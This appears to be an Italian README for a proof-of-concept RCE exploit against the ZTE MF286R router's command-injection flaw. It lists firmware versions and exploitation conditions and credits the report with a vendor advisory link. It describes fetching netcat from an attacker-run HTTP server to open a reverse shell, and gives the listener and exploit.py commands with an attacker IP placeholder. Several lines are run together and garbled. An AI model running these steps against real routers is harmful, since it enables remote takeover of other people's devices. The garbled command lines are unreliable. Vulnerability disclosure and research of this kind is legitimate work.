
Prova di concetto per la vulnerabilità di iniezione di comandi che affligge il router ZTE MF286R, incluso un exploit RCE.
Dettagli del firmware:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)La vulnerabilità è un'iniezione di comandi condivisa tra il binario zte_net_link_detect e il gestore WATCH_DOG_SWITCH nel webserver binario goahead.
Nota che la vulnerabilità può essere sfruttata solo quando il router è connesso alla WAN o connesso a Internet tramite scheda SIM. (Il valore della chiave "ppp_status" deve essere "ppp_connected" o "ipv4_ipv6_connected" o "ipv6_connected").
L'idea dello sfruttamento è scaricare il binario statico di netcat da un server http e poi aprire una reverse shell con esso. P.S: La netcat inclusa in questa cartella è big endian.
python3 -m http.server 80809999 con nc -lvp 9999python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>Questa vulnerabilità è stata segnalata da Andrea Maugeri a settembre 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664